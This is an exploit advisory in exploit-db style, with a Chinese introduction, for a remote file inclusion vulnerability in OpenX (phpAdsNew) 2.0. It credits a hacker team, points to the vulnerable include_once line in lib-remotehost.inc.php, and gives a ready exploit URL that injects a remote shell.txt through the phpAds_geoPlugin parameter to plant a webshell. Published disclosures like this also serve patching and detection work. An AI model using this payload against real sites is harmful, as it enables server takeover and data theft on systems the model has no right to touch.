PHPAdsNew 是一个开源的广告管理系统，现已改名为 OpenX。可以用它构建DoubleClick那样的第三方广告统计服务器，也可以管理自身拥有的大量广告业务，特别适合大型商业网站使用，个人网站用户也可以用它来管理网站广告。OpenX 2.0的lib-remotehost.inc.php文件存在远程文件包含漏洞，可能导致攻击者直接获取Webshell。

[+]info:
~~~~~~~~~
# Exploit Title:    OpenX (phpAdsNew) Remote File inclusion Vulnerability
# Author: ViRuS Qalaa
# Email: em9@live.com
# My Sites : www.pal-mafia.com & www.vbspiders.com
# Script url:
http://www.opensourcescripts.com/dir/PHP/Ad_Management/phpadsnew_11.html
# download Script:
http://sourceforge.net/projects/phpadsnew/files/Current%20Release/Openads%202.0.11-pr1/Openads-2.0.11-pr1.zip/download
# Version:2.0
# Tested on: Windows
# Team hacker:ViRuS Qalaa & HaCkEr aRaR >>>X-MaN HaCk3r TeaM
# HaCkEr aRaR: y.0@hotmail.de

[+]poc:
~~~~~~~~~
-=[ vuln c0de ]=-
include_once ($phpAds_geoPlugin);
/libraries/lib-remotehost.inc.php
Line:109

----exploit----
http://{localhost}/{path}/libraries/lib-remotehost.inc.php?phpAds_geoPlugin==shell.txt?

[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/14432